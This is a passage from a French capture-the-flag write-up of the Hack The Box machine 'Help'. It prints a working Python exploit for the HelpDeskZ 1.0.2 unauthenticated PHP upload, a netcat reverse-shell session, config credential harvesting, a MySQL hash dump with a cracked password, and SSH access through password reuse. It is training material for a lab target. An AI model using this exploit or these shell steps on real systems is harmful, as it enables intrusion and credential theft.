class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="file-upload--php-reverse-shell">File Upload : PHP reverse shell </h3><p>On trouve un premier exploit qui ne fonctionne pas, il s&rsquo;agit d&rsquo;un file upload permettant d&rsquo;executer du code php. En realité la machine est bien exploitable, mais l&rsquo;exploit ne fonctionne pas à cause d&rsquo;un problème d&rsquo;horaire. La machine n&rsquo;est pas à la meme heure que la notre, et l&rsquo;exploit est basé, en autre, sur l&rsquo;heure. Il a donc fallu rajotuer dans l&rsquo;exploit ceci:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">##Getting the Time from the server</span> </span></span><span class="line"><span class="cl"><span class="nv">response</span> <span class="o">=</span> requests.head<span class="o">(</span><span class="s1">&#39;http://10.10.10.121/support/&#39;</span><span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">serverTime</span> <span class="o">=</span> response.headers<span class="o">[</span><span class="s1">&#39;Date&#39;</span><span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="c1">##setting the time in Epoch</span> </span></span><span class="line"><span class="cl"><span class="nv">FormatTime</span> <span class="o">=</span> <span class="s1">&#39;%a, %d %b %Y %H:%M:%S %Z&#39;</span> </span></span><span class="line"><span class="cl"><span class="nv">currentTime</span> <span class="o">=</span> int<span class="o">(</span>calendar.timegm<span class="o">(</span>time.strptime<span class="o">(</span>serverTime, FormatTime<span class="o">)))</span> </span></span></code></pre></td></tr></table> </div> </div><p>Cela permet de recuperer l&rsquo;heure exacte défini sur Helpdeskz, c&rsquo;est important pour la suite de l&rsquo;exploitation. En cherchant un peu sur github, on trouve justement l&rsquo;exploit original avec ces quelques lignes de code supplémentaire (je n&rsquo;ai pas eu besoin de rajouter ce code moi même mais c&rsquo;était faisable.).</p> <p>Voici le fichier d&rsquo;exploitation en Python permettant d&rsquo;executer le fichier téléchargé sur la machine. Dans un premier temps il a fallu creer un ticket et ajouter une piece jointe avec un fichier php (reverse shell). Il faut, seulement ensuite, executer le code python qui doit retrouver le fichier php et l&rsquo;executer.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">##!/bin/python</span> </span></span><span class="line"><span class="cl"><span class="c1">##This is a modified version of https://www.exploit-db.com/raw/40300</span> </span></span><span class="line"><span class="cl"><span class="c1">##Since the sysntax on time calculation is incorect</span> </span></span><span class="line"><span class="cl"><span class="s1">&#39;&#39;&#39; </span></span></span><span class="line"><span class="cl"><span class="s1">The default configuration of this software allows for php files to be uploaded </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">Steps to reproduce </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">Fill out a ticket form and attach a php file, solve the captcha and upload, </span></span></span><span class="line"><span class="cl"><span class="s1">(the application will display &#39;</span>File is not allowed<span class="s1">&#39; but the file is still uploaded!! </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">Set up a netcat session to catch the reverse shell </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">Run this script and receive a reverse shell back!!! </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">&#39;&#39;&#39;</span> </span></span><span class="line"><span class="cl">import hashlib </span></span><span class="line"><span class="cl">import time, calendar </span></span><span class="line"><span class="cl">import sys </span></span><span class="line"><span class="cl">import requests </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">print <span class="s1">&#39;HelpDesk v1.0.2 - Unauthenticated shell upload&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> len<span class="o">(</span>sys.argv<span class="o">)</span> &lt; 3: </span></span><span class="line"><span class="cl"> print <span class="s2">&#34;Usage: {} http://helpdeskz.com/support/uploads/tickets/ Reverse-shell.php&#34;</span>.format<span class="o">(</span>sys.argv<span class="o">[</span>0<span class="o">])</span> </span></span><span class="line"><span class="cl"> sys.exit<span class="o">(</span>1<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">helpdeskzBaseUrl</span> <span class="o">=</span> sys.argv<span class="o">[</span>1<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="nv">fileName</span> <span class="o">=</span> sys.argv<span class="o">[</span>2<span class="o">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">##Getting the Time from the server</span> </span></span><span class="line"><span class="cl"><span class="nv">response</span> <span class="o">=</span> requests.head<span class="o">(</span><span class="s1">&#39;http://10.10.10.121/support/&#39;</span><span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">serverTime</span> <span class="o">=</span> response.headers<span class="o">[</span><span class="s1">&#39;Date&#39;</span><span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="c1">##setting the time in Epoch</span> </span></span><span class="line"><span class="cl"><span class="nv">FormatTime</span> <span class="o">=</span> <span class="s1">&#39;%a, %d %b %Y %H:%M:%S %Z&#39;</span> </span></span><span class="line"><span class="cl"><span class="nv">currentTime</span> <span class="o">=</span> int<span class="o">(</span>calendar.timegm<span class="o">(</span>time.strptime<span class="o">(</span>serverTime, FormatTime<span class="o">)))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">for</span> x in range<span class="o">(</span>0,300<span class="o">)</span>: </span></span><span class="line"><span class="cl"> <span class="nv">plaintext</span> <span class="o">=</span> fileName + str<span class="o">(</span>currentTime -x<span class="o">)</span> </span></span><span class="line"><span class="cl"> <span class="nv">md5hash</span> <span class="o">=</span> hashlib.md5<span class="o">(</span>plaintext<span class="o">)</span>.hexdigest<span class="o">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nv">url</span> <span class="o">=</span> helpdeskzBaseUrl + md5hash + <span class="s1">&#39;.php&#39;</span> </span></span><span class="line"><span class="cl"> <span class="nv">response</span> <span class="o">=</span> requests.head<span class="o">(</span>url<span class="o">)</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> response.status_code <span class="o">==</span> 200: </span></span><span class="line"><span class="cl"> print<span class="o">(</span><span class="s2">&#34;found!&#34;</span><span class="o">)</span> </span></span><span class="line"><span class="cl"> print<span class="o">(</span>url<span class="o">)</span> </span></span><span class="line"><span class="cl"> sys.exit<span class="o">(</span>0<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">print<span class="o">(</span><span class="s2">&#34;Sorry, I did not find anything&#34;</span><span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><p>On voit ici l&rsquo;obtention d&rsquo;un reverse shell :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nc -lnvp <span class="m">9001</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::9001 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:9001 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.121. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.121:34876. </span></span><span class="line"><span class="cl">SOCKET: Shell has connected! PID: <span class="m">1312</span> </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl"><span class="nb">help</span> </span></span><span class="line"><span class="cl">python3 -c <span class="s1">&#39;import pty;pty.spawn(&#34;/bin/bash&#34;)&#39;</span> </span></span><span class="line"><span class="cl">help@help:/var/www/html/support/uploads/tickets$ <span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl">help@help:/var/www/html/support/uploads/tickets$ ^Z </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + <span class="m">3405</span> suspended nc -lnvp <span class="m">9001</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>Aug 26, <span class="m">2025</span> - 00:39:46 <span class="o">(</span>CEST<span class="o">)]</span> exegol-pentest /workspace <span class="c1"># stty raw -echo;fg </span> </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + <span class="m">3405</span> continued nc -lnvp <span class="m">9001</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">help@help:/var/www/html/support/uploads/tickets$ </span></span><span class="line"><span class="cl">help@help:/var/www/html/support/uploads/tickets$ ls </span></span><span class="line"><span class="cl">072358eef300beb18834f16ffb121aee.php 5d13aeec839047b1647d58538fd788b8.png </span></span><span class="line"><span class="cl">1041ae9bd805fcd792d6a1e775ca8fab.txt c89564cd603a96bafcd9e53210d6042b.txt </span></span><span class="line"><span class="cl">11768880feca2125903635561dd4d047.php fd517142e88d1dfb1c8616b7f8824891.txt </span></span><span class="line"><span class="cl">1c9c8783677b6498d5e2453241c6c3b9.php index.php </span></span><span class="line"><span class="cl">316c27c726d57e961f236992c9788715.php </span></span><span class="line"><span class="cl">help@help:/var/www/html/support/uploads/tickets$ <span class="nb">cd</span> /home/ </span></span><span class="line"><span class="cl">help@help:/home$ ls </span></span><span class="line"><span class="cl"><span class="nb">help</span> </span></span><span class="line"><span class="cl">help@help:/home$ <span class="nb">cd</span> help/ </span></span><span class="line"><span class="cl">help@help:/home/help$ ls </span></span><span class="line"><span class="cl"><span class="nb">help</span> npm-debug.log user.txt </span></span><span class="line"><span class="cl">-------------&gt; </span></span><span class="line"><span class="cl">help@help:/home/help$ cat user.txt </span></span><span class="line"><span class="cl">b800.....6650 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">---------------------------------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">python2 final2.py http://help.htb/support/uploads/tickets/ s2.php </span></span><span class="line"><span class="cl">HelpDesk v1.0.2 - Unauthenticated shell upload </span></span><span class="line"><span class="cl"><span class="m">1756161392</span> </span></span></code></pre></td></tr></table> </div> </div><p>On obtient finalement un shell en tant que l&rsquo;utilisateur <code>help</code>.</p> <h3 id="second-file-upload--sql-injection-cve">Second File Upload / SQL Injection CVE </h3><p>Une deuxième exploitation était possible. Il fallait se connecter avec les credentials trouvés dans <strong>graphql</strong> sur la plateforme Helpdeskz et poster un ticket avec une pièce-jointe. Il était alors possible ensuite de faire des requêtes vers cette pièce jointe en faisant une injection SQL dans l&rsquo;url.</p> <p>En sauvegardant la requête à l&rsquo;aide Burp, puis en utilisant <strong>sqlmap</strong>, il n&rsquo;est pas trop dur de l&rsquo;exploiter. J&rsquo;ai tenté d&rsquo;utiliser une exploit déjà écrite, mais ça n&rsquo;a pas fonctionné. A la fin, vous pouvez voir comment l&rsquo;exploiter dans la section <strong>Bonus</strong>.</p> <h3 id="mysql--staff-table">mysql : staff table </h3><p>En cherchant dans les fichiers de site web, on trouve un dossier includes avec un fichier config.php contenant les credentials pour se connecter à une base de donnée SQL. En cherchant dans la base de données on découvre une base de donnée support avec une table staff contenant un user &ldquo;admin&rdquo; et un hachage :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">help@help:/var/www$ <span class="nb">cd</span> html </span></span><span class="line"><span class="cl">help@help:/var/www/html$ ls </span></span><span class="line"><span class="cl">index.html support </span></span><span class="line"><span class="cl">help@help:/var/www/html$ <span class="nb">cd</span> support </span></span><span class="line"><span class="cl">help@help:/var/www/html/support$ ls </span></span><span class="line"><span class="cl">LICENSE.txt captcha.php facebookOAuth images js views </span></span><span class="line"><span class="cl">README.md controllers favicon.ico includes readme.html </span></span><span class="line"><span class="cl">UPGRADING.txt css googleOAuth index.php uploads </span></span><span class="line"><span class="cl">help@help:/var/www/html/support$ <span class="nb">cd</span> includes/ </span></span><span class="line"><span class="cl">help@help:/var/www/html/support/includes$ ls </span></span><span class="line"><span class="cl">PHPMailer classes helpdesk.inc.php pipe.php </span></span><span class="line"><span class="cl">Twig config.php index.php staff.inc.php </span></span><span class="line"><span class="cl">bootstrap.php functions.php language support.sql </span></span><span class="line"><span class="cl">captcha.ttf global.php parser timezone.inc.php </span></span><span class="line"><span class="cl">help@help:/var/www/html/support/includes$ cat config.php </span></span><span class="line"><span class="cl">&lt;?php </span></span><span class="line"><span class="cl"> <span class="nv">$config</span><span class="o">[</span><span class="s1">&#39;Database&#39;</span><span class="o">][</span><span class="s1">&#39;dbname&#39;</span><span class="o">]</span> <span class="o">=</span> <span class="s1">&#39;support&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nv">$config</span><span class="o">[</span><span class="s1">&#39;Database&#39;</span><span class="o">][</span><span class="s1">&#39;tableprefix&#39;</span><span class="o">]</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nv">$config</span><span class="o">[</span><span class="s1">&#39;Database&#39;</span><span class="o">][</span><span class="s1">&#39;servername&#39;</span><span class="o">]</span> <span class="o">=</span> <span class="s1">&#39;localhost&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nv">$config</span><span class="o">[</span><span class="s1">&#39;Database&#39;</span><span class="o">][</span><span class="s1">&#39;username&#39;</span><span class="o">]</span> <span class="o">=</span> <span class="s1">&#39;root&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nv">$config</span><span class="o">[</span><span class="s1">&#39;Database&#39;</span><span class="o">][</span><span class="s1">&#39;password&#39;</span><span class="o">]</span> <span class="o">=</span> <span class="s1">&#39;helpme&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nv">$config</span><span class="o">[</span><span class="s1">&#39;Database&#39;</span><span class="o">][</span><span class="s1">&#39;type&#39;</span><span class="o">]</span> <span class="o">=</span> <span class="s1">&#39;mysqli&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> ?&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Connexion à la base de donnée <code>mysql</code> en utilisant les credentials trouvés précédemment :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">help@help:/var/www/html/support/includes$ mysql -u root -p </span></span><span class="line"><span class="cl">Enter password: </span></span><span class="line"><span class="cl">Welcome to the MySQL monitor. Commands end with <span class="p">;</span> or <span class="se">\g</span>. </span></span><span class="line"><span class="cl">Your MySQL connection id is <span class="m">785</span> </span></span><span class="line"><span class="cl">Server version: 5.7.24-0ubuntu0.16.04.1 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>c<span class="o">)</span> 2000, 2018, Oracle and/or its affiliates. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Oracle is a registered trademark of Oracle Corporation and/or its </span></span><span class="line"><span class="cl">affiliates. Other names may be trademarks of their respective </span></span><span class="line"><span class="cl">owners. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Type <span class="s1">&#39;help;&#39;</span> or <span class="s1">&#39;\h&#39;</span> <span class="k">for</span> help. Type <span class="s1">&#39;\c&#39;</span> to clear the current input statement. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">mysql&gt; .tables </span></span><span class="line"><span class="cl"> -&gt; <span class="p">;</span> </span></span><span class="line"><span class="cl">ERROR <span class="m">1064</span> <span class="o">(</span>42000<span class="o">)</span>: You have an error in your SQL syntax<span class="p">;</span> check the manual that corresponds to your MySQL server version <span class="k">for</span> the right syntax to use near <span class="s1">&#39;.tables&#39;</span> at line <span class="m">1</span> </span></span><span class="line"><span class="cl">mysql&gt; show tables<span class="p">;</span> </span></span><span class="line"><span class="cl">ERROR <span class="m">1046</span> <span class="o">(</span>3D000<span class="o">)</span>: No database selected </span></span><span class="line"><span class="cl">mysql&gt; show db<span class="p">;</span> </span></span><span class="line"><span class="cl">ERROR <span class="m">1064</span> <span class="o">(</span>42000<span class="o">)</span>: You have an error in your SQL syntax<span class="p">;</span> check the manual that corresponds to your MySQL server version <span class="k">for</span> the right syntax to use near <span class="s1">&#39;db&#39;</span> at line <span class="m">1</span> </span></span><span class="line"><span class="cl">mysql&gt; show databases<span class="p">;</span> </span></span><span class="line"><span class="cl">+--------------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> Database <span class="p">|</span> </span></span><span class="line"><span class="cl">+--------------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> information_schema <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> mysql <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> performance_schema <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> support <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> sys <span class="p">|</span> </span></span><span class="line"><span class="cl">+--------------------+ </span></span><span class="line"><span class="cl"><span class="m">5</span> rows in <span class="nb">set</span> <span class="o">(</span>0.02 sec<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">mysql&gt; use support </span></span><span class="line"><span class="cl">Reading table information <span class="k">for</span> completion of table and column names </span></span><span class="line"><span class="cl">You can turn off this feature to get a quicker startup with -A </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Database changed </span></span><span class="line"><span class="cl">mysql&gt; show tables </span></span><span class="line"><span class="cl"> -&gt; <span class="p">;</span> </span></span><span class="line"><span class="cl">+--+ </span></span><span class="line"><span class="cl"><span class="p">|</span> Tables_in_support <span class="p">|</span> </span></span><span class="line"><span class="cl">+--+ </span></span><span class="line"><span class="cl"><span class="p">|</span> articles <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> attachments <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> canned_response <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> custom_fields <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> departments <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> emails <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> error_log <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> file_types <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> knowledgebase_category <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> login_attempt <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> login_log <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> news <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> pages <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> priority <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> settings <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> staff <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> tickets <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> tickets_messages <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> users <span class="p">|</span> </span></span><span class="line"><span class="cl">+--+ </span></span><span class="line"><span class="cl"><span class="m">19</span> rows in <span class="nb">set</span> <span class="o">(</span>0.00 sec<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">mysql&gt; <span class="k">select</span> * from staff<span class="p">;</span> </span></span><span class="line"><span class="cl">+----+----------+--------------------+---------------+--------------------+------------+------------+--------------------+----------+--------+--+--------+-------+--------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> id <span class="p">|</span> username <span class="p">|</span> password <span class="p">|</span> fullname <span class="p">|</span> email <span class="p">|</span> login <span class="p">|</span> last_login <span class="p">|</span> department <span class="p">|</span> timezone <span class="p">|</span> signature <span class="p">|</span> newticket_notification <span class="p">|</span> avatar <span class="p">|</span> admin <span class="p">|</span> status <span class="p">|</span> </span></span><span class="line"><span class="cl">+----+----------+--------------------+---------------+--------------------+------------+------------+--------------------+----------+--------+--+--------+-------+--------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">1</span> <span class="p">|</span> admin <span class="p">|</span> d318f44739dced66793b1a603028133a76ae680e <span class="p">|</span> Administrator <span class="p">|</span> support@mysite.com <span class="p">|</span> <span class="m">1547216217</span> <span class="p">|</span> <span class="m">1543429746</span> <span class="p">|</span> a:1:<span class="o">{</span>i:0<span class="p">;</span>s:1:<span class="s2">&#34;1&#34;</span><span class="p">;</span><span class="o">}</span> <span class="p">|</span> <span class="p">|</span> Best regards, </span></span><span class="line"><span class="cl">Administrator <span class="p">|</span> <span class="m">0</span> <span class="p">|</span> NULL <span class="p">|</span> <span class="m">1</span> <span class="p">|</span> Enable <span class="p">|</span> </span></span><span class="line"><span class="cl">+----+----------+--------------------+---------------+--------------------+------------+------------+--------------------+----------+--------+--+--------+-------+--------+ </span></span><span class="line"><span class="cl"><span class="m">1</span> row in <span class="nb">set</span> <span class="o">(</span>0.00 sec<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">mysql&gt; exit<span class="p">;</span> </span></span></code></pre></td></tr></table> </div> </div><p>En utilisant <code>crackstation.net</code>, on tente de retrouver le mot de passe relié au hachage et on obtient: <code>d318f44739dced66793b1a603028133a76ae680e</code> -&gt; Welcome1</p> <p>On peut maintenant se connecter en SSH avec le compte help et ce mot de passe (PASSWORD REUSE&hellip;) :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ssh help@help.htb </span></span><span class="line"><span class="cl">help@help.htb<span class="err">&#39;</span>s password: </span></span><span class="line"><span class="cl">Welcome to Ubuntu 16.04.5 LTS <span class="o">(</span>GNU/Linux 4.4.0-116-generic x86_64<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> * Documentation: https://help.ubuntu.com </span></span><span class="line"><span class="cl"> * Management: https://landscape.canonical.com </span></span><span class="line"><span class="cl"> * Support: https://ubuntu.com/advantage </span></span><span class="line"><span class="cl">You have new mail. </span></span><span class="line"><span class="cl">Last login: Fri Jan <span class="m">11</span> 06:18:50 <span class="m">2019</span> </span></span><span class="line"><span class="cl">help@help:~$ </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="vulnerable-kernel--linux-version-440-116-generic">Vulnerable Kernel : Linux version 4.4.0-116-generic </h3><p>En utilisant linpeas, on trouve la version du Kernel qui semble un peu vieux (Feb 12 21:23:04 UTC 2018) alors que la machine date de Janvier 2019. On tente une recherche sur internet et sur <strong>searchsploit</strong> pour voir si ce kernel est vulnerable.</p> <p>Il semble que les Kernel linux en dessous de cette version sont vulnerable mais pas celle ci. C&rsquo;est à dire : &lt; 4.4.0-116-generic. D&rsquo;après ce que j&rsquo;ai appris, il est toujours important de vérifier quand même si une exploitation est possible pour une version, même si c&rsquo;est indiqué &ldquo;&lt;&rdquo;. Parfois, &ldquo;&lt;&rdquo; est en realité &ldquo;&lt;=&rdquo;.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">══════════════════════════════╣ System Information ╠══════════════════════════════ </span></span><span 